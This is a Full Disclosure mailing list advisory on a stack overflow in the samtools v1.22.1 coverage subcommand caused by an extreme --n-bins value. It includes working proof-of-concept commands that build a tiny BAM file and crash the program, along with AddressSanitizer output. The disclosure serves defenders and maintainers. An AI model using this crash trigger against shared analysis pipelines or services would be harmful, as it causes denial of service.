
Full Disclosure mailing list archives
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 28 Sep 2025 12:13:48 -0400
In the samtools coverage subcommand, the -w / --n-bins option allows the user to specify how many “bins” to produce in the coverage histogram. The code computes: stats[tid].bin_width = (stats[tid].end - stats[tid].beg) / n_bins; When the number of bins (n_bins) is extremely large relative to the region length (end - beg), this integer division can yield zero, or lead to unexpected behavior in subsequent arithmetic. Later in print_hist(), calculations involving current_bin, row_bin_size, and loop bounds can overflow or cause invalid branching, eventually leading to stack recursion or unbounded stack-consumption. In practice, supplying a huge bin count (e.g. 2147483647) triggers stack overflow in print_hist() (as observed) and crashes the program. *Impact:* - Denial of Service (DoS). - Memory corruption. *PoC (Proof of Concept)* Create a minimal BAM with a large declared reference size and one read: echo -e "@HD\tVN:1.6@SQ\tSN:chrX\tLN:500000000r1\t0\tchrX\t1\t60\t10M\t*\t0\t0\tAAAAAAAAAA\tIIIIIIIIII" \ | ./samtools view -b -o huge.bam - ./samtools index huge.bam Run coverage with a massive bin count: ./samtools coverage -w 2147483647 huge.bam * Expected crash:* AddressSanitizer:DEADLYSIGNAL ================================================================= ==1070796==ERROR: AddressSanitizer: stack-overflow on address 0xfffef18a7ff0 (pc 0xab400a2993cc bp 0xffffdff5a910 sp 0xfffef18a7ff0 T0) #0 0xab400a2993cc in print_hist /root/samtools/coverage.c:236:22 #1 0xab400a29c304 in main_coverage /root/samtools/coverage.c:674:13 #2 0xab400a286044 in main /root/samtools/bamtk.c:271:55 #3 0xff6004352290 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #4 0xff6004352374 in __libc_start_main csu/../csu/libc-start.c:360:3 #5 0xab400a15cc6c in _start (/root/samtools/samtools+0x3cc6c) (BuildId: 031fb204568f835410c0dd07ee99a915c9a7b660) SUMMARY: AddressSanitizer: stack-overflow /root/samtools/coverage.c:236:22 in print_hist ==1070796==ABORTING _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow Ron E (Sep 30)